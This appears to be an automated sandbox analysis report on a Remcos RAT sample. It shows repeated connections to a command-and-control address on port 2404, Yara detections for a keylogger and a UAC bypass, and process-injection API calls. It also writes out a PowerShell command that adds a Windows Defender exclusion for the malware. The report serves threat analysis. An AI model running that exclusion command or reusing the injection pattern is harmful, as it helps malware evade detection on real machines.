                      Jan 9, 2025 12:43:22.314320087 CET24045006687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:22.479923010 CET500672404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:22.485241890 CET24045006787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:22.485362053 CET500672404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:22.488821030 CET500672404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:22.493933916 CET24045006787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:24.106372118 CET24045006787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:24.106539965 CET500672404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:24.106587887 CET500672404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:24.111386061 CET24045006787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:24.276643991 CET500682404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:24.281631947 CET24045006887.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:24.281740904 CET500682404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:24.285336018 CET500682404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:24.290132046 CET24045006887.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:25.901726007 CET24045006887.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:25.901856899 CET500682404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:25.901911020 CET500682404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:25.906712055 CET24045006887.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:26.058316946 CET500692404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:26.063225985 CET24045006987.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:26.063421965 CET500692404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:26.071672916 CET500692404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:26.076524973 CET24045006987.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:27.704514027 CET24045006987.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:27.707179070 CET500692404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:27.707215071 CET500692404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:27.712527037 CET24045006987.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:27.886317968 CET500702404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:27.891375065 CET24045007087.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:27.895082951 CET500702404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:27.949398994 CET500702404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:27.954402924 CET24045007087.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:29.528249979 CET24045007087.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:29.528328896 CET500702404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:29.528362989 CET500702404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:29.533206940 CET24045007087.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:29.683542967 CET500712404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:29.688479900 CET24045007187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:29.688570023 CET500712404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:29.693553925 CET500712404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:29.698467016 CET24045007187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:31.310023069 CET24045007187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:31.310182095 CET500712404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:31.310389042 CET500712404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:31.315190077 CET24045007187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:31.448812008 CET500722404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:31.453794956 CET24045007287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:31.453898907 CET500722404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:31.458666086 CET500722404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:31.463515043 CET24045007287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:33.056727886 CET24045007287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:33.058074951 CET500722404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:33.058106899 CET500722404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:33.062943935 CET24045007287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:33.198527098 CET500732404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:33.203520060 CET24045007387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:33.203623056 CET500732404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:33.207973003 CET500732404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:33.212831020 CET24045007387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:34.809420109 CET24045007387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:34.811387062 CET500732404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:34.811388016 CET500732404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:34.816292048 CET24045007387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:34.948596001 CET500742404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:34.953480005 CET24045007487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:34.953562021 CET500742404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:34.957353115 CET500742404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:34.962176085 CET24045007487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:36.579569101 CET24045007487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:36.579694986 CET500742404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:36.579755068 CET500742404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:36.584536076 CET24045007487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:36.714529037 CET500752404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:36.719496012 CET24045007587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:36.719614983 CET500752404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:36.725311041 CET500752404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:36.730169058 CET24045007587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:38.321717978 CET24045007587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:38.322987080 CET500752404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:38.323096991 CET500752404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:38.327863932 CET24045007587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:38.456716061 CET500762404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:38.461671114 CET24045007687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:38.462958097 CET500762404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:38.466710091 CET500762404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:38.471579075 CET24045007687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:40.075409889 CET24045007687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:40.075532913 CET500762404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:40.075632095 CET500762404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:40.080439091 CET24045007687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:40.198455095 CET500772404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:40.203486919 CET24045007787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:40.203615904 CET500772404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:40.207107067 CET500772404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:40.211883068 CET24045007787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:41.825535059 CET24045007787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:41.826951981 CET500772404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:41.834038973 CET500772404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:41.838814020 CET24045007787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:41.952678919 CET500782404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:41.957618952 CET24045007887.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:41.957801104 CET500782404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:41.967066050 CET500782404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:41.971864939 CET24045007887.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:43.575615883 CET24045007887.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:43.577002048 CET500782404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:43.580912113 CET500782404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:43.585695028 CET24045007887.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:43.698555946 CET500792404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:43.703500986 CET24045007987.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:43.704957008 CET500792404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:43.708328009 CET500792404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:43.713115931 CET24045007987.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:45.327891111 CET24045007987.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:45.327959061 CET500792404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:45.328022003 CET500792404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:45.332820892 CET24045007987.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:45.432849884 CET500802404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:45.437839031 CET24045008087.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:45.437921047 CET500802404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:45.440855980 CET500802404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:45.445589066 CET24045008087.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:47.057473898 CET24045008087.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:47.057658911 CET500802404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:47.057899952 CET500802404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:47.062663078 CET24045008087.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:47.168771029 CET500812404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:47.173705101 CET24045008187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:47.173809052 CET500812404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:47.178067923 CET500812404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:47.182843924 CET24045008187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:48.803903103 CET24045008187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:48.804025888 CET500812404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:48.804115057 CET500812404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:48.808877945 CET24045008187.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:48.901674986 CET500822404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:48.906554937 CET24045008287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:48.906699896 CET500822404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:48.910198927 CET500822404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:48.915011883 CET24045008287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:50.545871019 CET24045008287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:50.545968056 CET500822404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:50.546009064 CET500822404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:50.550776958 CET24045008287.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:50.651595116 CET500832404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:50.656495094 CET24045008387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:50.656579018 CET500832404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:50.660459042 CET500832404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:50.665348053 CET24045008387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:52.259924889 CET24045008387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:52.260025978 CET500832404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:52.260076046 CET500832404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:52.264883041 CET24045008387.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:52.354774952 CET500842404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:52.359721899 CET24045008487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:52.359798908 CET500842404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:52.363303900 CET500842404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:52.368071079 CET24045008487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:53.981933117 CET24045008487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:53.981993914 CET500842404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:53.982047081 CET500842404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:53.986865997 CET24045008487.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:54.073484898 CET500852404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:54.078346968 CET24045008587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:54.078461885 CET500852404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:54.081756115 CET500852404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:54.086543083 CET24045008587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:55.701385021 CET24045008587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:55.701456070 CET500852404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:55.701553106 CET500852404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:55.706341982 CET24045008587.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:55.792217016 CET500862404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:55.797280073 CET24045008687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:55.799984932 CET500862404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:55.803524971 CET500862404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:55.808425903 CET24045008687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:57.419488907 CET24045008687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:57.419559956 CET500862404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:57.419611931 CET500862404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:57.424390078 CET24045008687.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:57.511043072 CET500872404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:57.516026020 CET24045008787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:57.521028996 CET500872404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:57.524334908 CET500872404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:57.529171944 CET24045008787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:59.159403086 CET24045008787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:59.159624100 CET500872404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:59.159624100 CET500872404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:59.164527893 CET24045008787.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:59.245270014 CET500882404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:59.250226021 CET24045008887.120.116.245192.168.2.5
                      Jan 9, 2025 12:43:59.250309944 CET500882404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:59.253617048 CET500882404192.168.2.587.120.116.245
                      Jan 9, 2025 12:43:59.258430958 CET24045008887.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:00.893310070 CET24045008887.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:00.893430948 CET500882404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:00.893517971 CET500882404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:00.898302078 CET24045008887.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:00.979839087 CET500892404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:00.984850883 CET24045008987.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:00.984950066 CET500892404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:00.988250017 CET500892404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:00.993118048 CET24045008987.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:02.572386026 CET24045008987.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:02.572468042 CET500892404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:02.572496891 CET500892404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:02.577276945 CET24045008987.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:02.651772022 CET500902404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:02.656689882 CET24045009087.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:02.656780958 CET500902404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:02.660972118 CET500902404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:02.665774107 CET24045009087.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:04.300842047 CET24045009087.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:04.300919056 CET500902404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:04.300971985 CET500902404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:04.305871010 CET24045009087.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:04.386225939 CET500912404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:04.391244888 CET24045009187.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:04.397033930 CET500912404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:04.400410891 CET500912404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:04.405291080 CET24045009187.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:06.013175964 CET24045009187.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:06.013243914 CET500912404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:06.013281107 CET500912404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:06.018088102 CET24045009187.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:06.089173079 CET500922404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:06.094959974 CET24045009287.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:06.096841097 CET500922404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:06.100370884 CET500922404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:06.106375933 CET24045009287.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:07.713512897 CET24045009287.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:07.713576078 CET500922404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:07.713711977 CET500922404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:07.718475103 CET24045009287.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:07.792275906 CET500932404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:07.797322989 CET24045009387.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:07.797410011 CET500932404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:07.801106930 CET500932404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:07.805952072 CET24045009387.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:09.440314054 CET24045009387.120.116.245192.168.2.5
                      Jan 9, 2025 12:44:09.440522909 CET500932404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:09.440649033 CET500932404192.168.2.587.120.116.245
                      Jan 9, 2025 12:44:09.445451975 CET24045009387.120.116.245192.168.2.5

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:06:39:59
                      Start date:09/01/2025
                      Path:C:\Users\user\Desktop\Material requirements_1.pif.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Material requirements_1.pif.exe"
                      Imagebase:0x990000
                      File size:969'728 bytes
                      MD5 hash:B10DBC0225AAC52E8EE344602847A3CC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:3
                      Start time:06:40:02
                      Start date:09/01/2025
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                      Imagebase:0x180000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:06:40:02
                      Start date:09/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:06:40:02
                      Start date:09/01/2025
                      Path:C:\Users\user\Desktop\Material requirements_1.pif.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\Material requirements_1.pif.exe"
                      Imagebase:0x2f0000
                      File size:969'728 bytes
                      MD5 hash:B10DBC0225AAC52E8EE344602847A3CC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:6
                      Start time:06:40:02
                      Start date:09/01/2025
                      Path:C:\Users\user\Desktop\Material requirements_1.pif.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\Material requirements_1.pif.exe"
                      Imagebase:0x170000
                      File size:969'728 bytes
                      MD5 hash:B10DBC0225AAC52E8EE344602847A3CC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:7
                      Start time:06:40:02
                      Start date:09/01/2025
                      Path:C:\Users\user\Desktop\Material requirements_1.pif.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Material requirements_1.pif.exe"
                      Imagebase:0xac0000
                      File size:969'728 bytes
                      MD5 hash:B10DBC0225AAC52E8EE344602847A3CC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:9
                      Start time:06:40:42
                      Start date:09/01/2025
                      Path:C:\Windows\System32\wbem\WMIADAP.exe
                      Wow64 process (32bit):false
                      Commandline:wmiadap.exe /F /T /R
                      Imagebase:0x7ff75c160000
                      File size:182'272 bytes
                      MD5 hash:1BFFABBD200C850E6346820E92B915DC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:11.2%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:3.8%
                        Total number of Nodes:208
                        Total number of Limit Nodes:8
                        execution_graph 41104 2d0d040 41105 2d0d086 41104->41105 41109 2d0d618 41105->41109 41113 2d0d628 41105->41113 41106 2d0d173 41110 2d0d628 41109->41110 41116 2d0d27c 41110->41116 41114 2d0d27c DuplicateHandle 41113->41114 41115 2d0d656 41114->41115 41115->41106 41117 2d0d690 DuplicateHandle 41116->41117 41118 2d0d656 41117->41118 41118->41106 41119 2d0acb0 41122 2d0ada8 41119->41122 41120 2d0acbf 41123 2d0addc 41122->41123 41124 2d0adb9 41122->41124 41123->41120 41124->41123 41125 2d0afe0 GetModuleHandleW 41124->41125 41126 2d0b00d 41125->41126 41126->41120 40940 4da0fd2 40941 4da0f65 40940->40941 40942 4da0fd5 40940->40942 40941->40940 40945 4da1b29 40941->40945 40950 4da1b38 40941->40950 40942->40942 40946 4da1b52 40945->40946 40955 4da1e70 40946->40955 40973 4da1e60 40946->40973 40947 4da1b5a 40947->40941 40951 4da1b52 40950->40951 40953 4da1e70 10 API calls 40951->40953 40954 4da1e60 10 API calls 40951->40954 40952 4da1b5a 40952->40941 40953->40952 40954->40952 40956 4da1e85 40955->40956 40957 4da1e97 40956->40957 40991 4da22bd 40956->40991 40996 4da257e 40956->40996 41000 4da20fa 40956->41000 41006 4da2266 40956->41006 41011 4da2700 40956->41011 41016 4da200d 40956->41016 41021 4da234c 40956->41021 41026 4da250f 40956->41026 41030 4da2228 40956->41030 41034 4da2448 40956->41034 41040 4da23cb 40956->41040 41045 4da21eb 40956->41045 41050 4da2315 40956->41050 41054 4da23b5 40956->41054 41059 4da20d0 40956->41059 40957->40947 40974 4da1e85 40973->40974 40975 4da20fa 2 API calls 40974->40975 40976 4da257e 2 API calls 40974->40976 40977 4da22bd 2 API calls 40974->40977 40978 4da20d0 2 API calls 40974->40978 40979 4da23b5 2 API calls 40974->40979 40980 4da2315 2 API calls 40974->40980 40981 4da1e97 40974->40981 40982 4da21eb 2 API calls 40974->40982 40983 4da23cb 2 API calls 40974->40983 40984 4da2448 2 API calls 40974->40984 40985 4da2228 2 API calls 40974->40985 40986 4da250f 2 API calls 40974->40986 40987 4da234c 2 API calls 40974->40987 40988 4da200d 2 API calls 40974->40988 40989 4da2700 2 API calls 40974->40989 40990 4da2266 2 API calls 40974->40990 40975->40981 40976->40981 40977->40981 40978->40981 40979->40981 40980->40981 40981->40947 40982->40981 40983->40981 40984->40981 40985->40981 40986->40981 40987->40981 40988->40981 40989->40981 40990->40981 40992 4da22c3 40991->40992 41063 4da0628 40992->41063 41067 4da0622 40992->41067 40993 4da29ef 41071 4da0538 40996->41071 41075 4da0532 40996->41075 40997 4da25ac 40997->40957 41002 4da2100 41000->41002 41001 4da2a62 41002->41001 41079 712fed0 41002->41079 41083 712feca 41002->41083 41003 4da27d3 41007 4da226c 41006->41007 41009 4da0538 WriteProcessMemory 41007->41009 41010 4da0532 WriteProcessMemory 41007->41010 41008 4da229e 41008->40957 41009->41008 41010->41008 41013 4da2706 41011->41013 41012 4da27d3 41014 712fed0 ResumeThread 41013->41014 41015 712feca ResumeThread 41013->41015 41014->41012 41015->41012 41017 4da2017 41016->41017 41087 4da07c0 41017->41087 41091 4da07b6 41017->41091 41022 4da22d5 41021->41022 41024 4da0628 ReadProcessMemory 41022->41024 41025 4da0622 ReadProcessMemory 41022->41025 41023 4da29ef 41024->41023 41025->41023 41027 4da20dc 41026->41027 41027->41026 41096 4da0478 41027->41096 41100 4da0472 41027->41100 41031 4da20dc 41030->41031 41032 4da0478 VirtualAllocEx 41031->41032 41033 4da0472 VirtualAllocEx 41031->41033 41032->41031 41033->41031 41036 4da22d5 41034->41036 41035 4da273f 41035->40957 41036->41035 41038 4da0628 ReadProcessMemory 41036->41038 